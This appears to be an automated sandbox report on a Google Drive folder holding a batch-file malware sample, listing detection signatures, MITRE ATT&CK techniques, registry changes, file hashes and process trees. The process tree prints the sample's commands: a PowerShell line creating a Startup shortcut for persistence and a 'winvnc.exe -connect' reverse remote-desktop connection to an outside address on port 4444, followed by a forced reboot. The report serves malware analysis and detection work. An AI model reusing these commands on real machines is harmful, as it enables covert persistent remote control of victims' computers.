hxxps://drive[.]google[.]com/drive/folders/19VvHwqfWxd-yUl_mPNdh1VRCtJl8IdZm?usp=sharing

Analysis

max time kernel
42s
max time network
44s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
08-08-2024 21:20

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

https://drive.google.com/drive/folders/19VvHwqfWxd-yUl_mPNdh1VRCtJl8IdZm?usp=sharing

Score

7^/10

discovery

Malware Config

Signatures

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\main.bat.lnk	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
2	drive.google.com
6	drive.google.com

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Delays execution with timeout.exe 2 IoCs

evasion

pid	Process
4144	timeout.exe
2516	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies data under HKEY_USERS 15 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "182"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10"	LogonUI.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271"	LogonUI.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings	msedge.exe

Suspicious behavior: EnumeratesProcesses 17 IoCs

pid	Process
3352	msedge.exe
3352	msedge.exe
4008	msedge.exe
4008	msedge.exe
4340	identity_helper.exe
4340	identity_helper.exe
1436	msedge.exe
1436	msedge.exe
2312	powershell.exe
2312	powershell.exe
2312	powershell.exe
916	winvnc.exe
916	winvnc.exe
916	winvnc.exe
916	winvnc.exe
2900	winvnc.exe
2900	winvnc.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs

pid	Process
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2312	powershell.exe
Token: SeShutdownPrivilege	1908	shutdown.exe
Token: SeRemoteShutdownPrivilege	1908	shutdown.exe

Suspicious use of FindShellTrayWindow 40 IoCs

pid	Process
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
916	winvnc.exe
916	winvnc.exe
916	winvnc.exe
916	winvnc.exe
916	winvnc.exe
916	winvnc.exe

Suspicious use of SendNotifyMessage 29 IoCs

pid	Process
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
916	winvnc.exe
916	winvnc.exe
916	winvnc.exe
916	winvnc.exe
916	winvnc.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3028	LogonUI.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4008 wrote to memory of 116	4008	msedge.exe	83
PID 4008 wrote to memory of 116	4008	msedge.exe	83
PID 4008 wrote to memory of 3552	4008	msedge.exe	84
PID 4008 wrote to memory of 3552	4008	msedge.exe	84
PID 4008 wrote to memory of 3552	4008	msedge.exe	84
PID 4008 wrote to memory of 3552	4008	msedge.exe	84
PID 4008 wrote to memory of 3552	4008	msedge.exe	84
PID 4008 wrote to memory of 3552	4008	msedge.exe	84
PID 4008 wrote to memory of 3552	4008	msedge.exe	84
PID 4008 wrote to memory of 3552	4008	msedge.exe	84
PID 4008 wrote to memory of 3552	4008	msedge.exe	84
PID 4008 wrote to memory of 3552	4008	msedge.exe	84
PID 4008 wrote to memory of 3552	4008	msedge.exe	84
PID 4008 wrote to memory of 3552	4008	msedge.exe	84
PID 4008 wrote to memory of 3552	4008	msedge.exe	84
PID 4008 wrote to memory of 3552	4008	msedge.exe	84
PID 4008 wrote to memory of 3552	4008	msedge.exe	84
PID 4008 wrote to memory of 3552	4008	msedge.exe	84
PID 4008 wrote to memory of 3552	4008	msedge.exe	84
PID 4008 wrote to memory of 3552	4008	msedge.exe	84
PID 4008 wrote to memory of 3552	4008	msedge.exe	84
PID 4008 wrote to memory of 3552	4008	msedge.exe	84
PID 4008 wrote to memory of 3552	4008	msedge.exe	84
PID 4008 wrote to memory of 3552	4008	msedge.exe	84
PID 4008 wrote to memory of 3552	4008	msedge.exe	84
PID 4008 wrote to memory of 3552	4008	msedge.exe	84
PID 4008 wrote to memory of 3552	4008	msedge.exe	84
PID 4008 wrote to memory of 3552	4008	msedge.exe	84
PID 4008 wrote to memory of 3552	4008	msedge.exe	84
PID 4008 wrote to memory of 3552	4008	msedge.exe	84
PID 4008 wrote to memory of 3552	4008	msedge.exe	84
PID 4008 wrote to memory of 3552	4008	msedge.exe	84
PID 4008 wrote to memory of 3552	4008	msedge.exe	84
PID 4008 wrote to memory of 3552	4008	msedge.exe	84
PID 4008 wrote to memory of 3552	4008	msedge.exe	84
PID 4008 wrote to memory of 3552	4008	msedge.exe	84
PID 4008 wrote to memory of 3552	4008	msedge.exe	84
PID 4008 wrote to memory of 3552	4008	msedge.exe	84
PID 4008 wrote to memory of 3552	4008	msedge.exe	84
PID 4008 wrote to memory of 3552	4008	msedge.exe	84
PID 4008 wrote to memory of 3552	4008	msedge.exe	84
PID 4008 wrote to memory of 3552	4008	msedge.exe	84
PID 4008 wrote to memory of 3352	4008	msedge.exe	85
PID 4008 wrote to memory of 3352	4008	msedge.exe	85
PID 4008 wrote to memory of 4256	4008	msedge.exe	86
PID 4008 wrote to memory of 4256	4008	msedge.exe	86
PID 4008 wrote to memory of 4256	4008	msedge.exe	86
PID 4008 wrote to memory of 4256	4008	msedge.exe	86
PID 4008 wrote to memory of 4256	4008	msedge.exe	86
PID 4008 wrote to memory of 4256	4008	msedge.exe	86
PID 4008 wrote to memory of 4256	4008	msedge.exe	86
PID 4008 wrote to memory of 4256	4008	msedge.exe	86
PID 4008 wrote to memory of 4256	4008	msedge.exe	86
PID 4008 wrote to memory of 4256	4008	msedge.exe	86
PID 4008 wrote to memory of 4256	4008	msedge.exe	86
PID 4008 wrote to memory of 4256	4008	msedge.exe	86
PID 4008 wrote to memory of 4256	4008	msedge.exe	86
PID 4008 wrote to memory of 4256	4008	msedge.exe	86
PID 4008 wrote to memory of 4256	4008	msedge.exe	86
PID 4008 wrote to memory of 4256	4008	msedge.exe	86
PID 4008 wrote to memory of 4256	4008	msedge.exe	86
PID 4008 wrote to memory of 4256	4008	msedge.exe	86
PID 4008 wrote to memory of 4256	4008	msedge.exe	86
PID 4008 wrote to memory of 4256	4008	msedge.exe	86

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
232	attrib.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://drive.google.com/drive/folders/19VvHwqfWxd-yUl_mPNdh1VRCtJl8IdZm?usp=sharing
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4008
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffaba0546f8,0x7ffaba054708,0x7ffaba054718
  2⤵
  PID:116
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,6407320627785495314,4748583907428131525,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2112 /prefetch:2
  2⤵
  PID:3552
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2096,6407320627785495314,4748583907428131525,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2836 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3352
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2096,6407320627785495314,4748583907428131525,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2916 /prefetch:8
  2⤵
  PID:4256
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,6407320627785495314,4748583907428131525,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3424 /prefetch:1
  2⤵
  PID:4812
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,6407320627785495314,4748583907428131525,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3552 /prefetch:1
  2⤵
  PID:732
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2096,6407320627785495314,4748583907428131525,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5528 /prefetch:8
  2⤵
  PID:232
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2096,6407320627785495314,4748583907428131525,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5528 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4340
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,6407320627785495314,4748583907428131525,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5208 /prefetch:1
  2⤵
  PID:1784
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2096,6407320627785495314,4748583907428131525,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=3976 /prefetch:8
  2⤵
  PID:4136
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,6407320627785495314,4748583907428131525,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3484 /prefetch:1
  2⤵
  PID:4472
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2096,6407320627785495314,4748583907428131525,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5736 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1436

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:428

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5072

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:2904

C:\Windows\System32\NOTEPAD.EXE
"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\Downloads\client-20240808T212101Z-001\client\main.bat
1⤵
PID:4004

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\client-20240808T212101Z-001\client\main.bat" "
1⤵
PID:3184
- C:\Windows\system32\attrib.exe
  attrib +R "C:\Users\Admin\Downloads\winvnc.exe"
  2⤵
  - Views/modifies file attributes
  PID:232
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell "$s=(New-Object -COM WScript.Shell).CreateShortcut('C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\main.bat.lnk');$s.TargetPath='C:\Users\Admin\Downloads\client-20240808T212101Z-001\client\main.bat';$s.Save()"
  2⤵
  - Drops startup file
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2312
- C:\Users\Admin\Downloads\client-20240808T212101Z-001\client\winvnc.exe
  winvnc.exe -run
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:916
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4144
- C:\Users\Admin\Downloads\client-20240808T212101Z-001\client\winvnc.exe
  winvnc.exe -connect 192.168.1.36::4444
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2900
- C:\Windows\system32\shutdown.exe
  shutdown /r /f /t 0
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1908
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell "$s=(New-Object -COM WScript.Shell).CreateShortcut('C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\main.bat.lnk');$s.TargetPath='C:\Users\Admin\Downloads\client-20240808T212101Z-001\client\main.bat';$s.Save()"
  2⤵
  PID:3956
- C:\Users\Admin\Downloads\client-20240808T212101Z-001\client\winvnc.exe
  winvnc.exe -run
  2⤵
  PID:3576
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2516
- C:\Users\Admin\Downloads\client-20240808T212101Z-001\client\winvnc.exe
  winvnc.exe -connect 192.168.1.36::4444
  2⤵
  PID:1924

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa395b055 /state1:0x41c64e6d
1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:3028

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {9BA05972-F6A8-11CF-A442-00A0C90A8F39} -Embedding
1⤵
PID:2648

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {9BA05972-F6A8-11CF-A442-00A0C90A8F39} -Embedding
1⤵
PID:3824

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
ecf7ca53c80b5245e35839009d12f866

SHA1
a7af77cf31d410708ebd35a232a80bddfb0615bb

SHA256
882a513b71b26210ff251769b82b2c5d59a932f96d9ce606ca2fab6530a13687

SHA512
706722bd22ce27d854036b1b16e6a3cdb36284b66edc76238a79c2e11cee7d1307b121c898ad832eb1af73e4f08d991d64dc0bff529896ffb4ebe9b3dc381696

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
4dd2754d1bea40445984d65abee82b21

SHA1
4b6a5658bae9a784a370a115fbb4a12e92bd3390

SHA256
183b8e82a0deaa83d04736553671cedb738adc909f483b3c5f822a0e6be7477d

SHA512
92d44ee372ad33f892b921efa6cabc78e91025e89f05a22830763217826fa98d51d55711f85c8970ac58abf9adc6c85cc40878032cd6d2589ab226cd099f99e1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
1KB

MD5
24c423334ce463572bf25cbd1932ecc0

SHA1
e1843a37410522c96ed077af19539543cdf35f28

SHA256
eb4cd2645d74e5cf2ed859527d01482f2dfb2a9f372d6979dff9f3eb5f13bb6a

SHA512
6c117f63c4e73266436f333fd8916e05835572150db7008558fdddba14d7e287494c2793cd0e947d387a0b18f68e54947718c21cff56902694468fdc4e591295

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
bc085affa9d73e438942b085bfba2320

SHA1
67d8451fe2fe2e3d33a7e26640f00ba8bd00bff3

SHA256
bf3c32a3faa8e084746bd2833b996baadae5b309d3b7f7ffc290cf0dc6a32636

SHA512
97a50d11142c5f013c007b2d40044ad1f212f79b38ca9f6b795f213f953270cbb4dd87790085bbdc82db702d88e419c13b26ec675e0883c0d14a968986352b1a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
c57e23f96af13e2c70a4f84571b1ad1b

SHA1
bc358e12ea19c7fd6bac3b5d9095917071f28236

SHA256
54b969d07a4f4201dcac2474462c81509bc987c713d472a5138b023996f16224

SHA512
cbf9eb9441a8bc20a2bb508b7ec7cf7c35559eba072b84ca08818119d94a8aeed799182da6297f4d339bd57aa1ecb72361923f14497d620d6fee204af4fa0e26

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
d30be9a094b7ebe0a619c145bdaebf12

SHA1
cffc89d6004ef7d6fda8f050393051c8103bb7b1

SHA256
062478c72bbb3aaa9cb372624fc15d2cf793aeb271cc9acc2e407a47ce19dfab

SHA512
a8b500265d4366a151490028f762b99b2c8f02c2fe6696c20b45c93f7ea81521a9830e82abf57a5627f666570dc624042e902ee7c6c6e1a5dfe503728f4d9825

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
2899deecf473d5767468c772f06124d3

SHA1
91278653bb376bd5c874f622860a96638cd449a0

SHA256
a8a03f6d1231e530f90990df69834599e6c02b0b5d181cbac21ea00a908e1f4a

SHA512
e5e5db81a5f0ff2ed9433a5f08795e139762b17bb7bf012d1f4514d7d01fafe981fcdaebdd25c077c4d1ca9bc70650b0328961d0dbaa0a743c588db2bc41abfa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
5f05cc8b0032c9bfe29d3738aeef9fb9

SHA1
5f99543c862d60de65358bff05421843aef870cd

SHA256
c7c0eca8316398b5bdd72c454fa0ba00b4758044d5cbd58ef08b479480f1e6bd

SHA512
b5b0595e492498e4898e59a0c8e6efdd79f1771afdf3fb0ac8219b71745c9d6fc41841ef798628b321fb6e7fd0d135e1321340b13604548361a2d246036be270

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
787a3676ccdbd410f206f03920537f04

SHA1
54bfb96153ad777562984027231fb542c8edfa8a

SHA256
45484f6f568870ac181b9e856b3257483653c7608e816eda4e37adbc4b0eb700

SHA512
335639cc8863c247137f167c9590ce7e25f9642d39c280d8aabf3c9d880314c54a7a528133a71d5350d666920db965a2fed1cf7fdaf8bd180e057734dc45fde7

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_z0v13c24.sw3.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\Downloads\client-20240808T212101Z-001.zip

Filesize
1.0MB

MD5
7ba89f91be74e08e36bac55f975a6252

SHA1
48377b9238777abefdb2049953b35f8dae8581d2

SHA256
ed7524837f4b358c7d86ae2e3a4324c21ad1d7edd56526dea3e40152f12b1c7a

SHA512
e2da895c63e8ea54428549e8494cebc95c33a86426edc4469d3da1d25970c2e78fd8bcb3fa95adfd4949028b9260944e18f78aa474b9f9d5ac244584d9d80c58

Download Submit
C:\Users\Admin\Downloads\client-20240808T212101Z-001\client\main.bat

Filesize
1KB

MD5
fe3c9e30e135468def72cd9a8feb3787

SHA1
22bd8a632af229dafa2a1aeb4d5f27ab00f3848f

SHA256
3efef532bbb18e40eb6a9df2f9e1b0004bd4e26ede3741d89cfc64ac1c146b02

SHA512
99e337f1a81dbd1b521236f95fde6051bf552bd044e65344e3480dfd6d16faedd0fdafa6d4e1d7fe4458cf10dd984766bf1a44c0b77eebc360507fa6894ff6ab

Download Submit
memory/2312-188-0x000002287F960000-0x000002287F982000-memory.dmp

Filesize
136KB

Download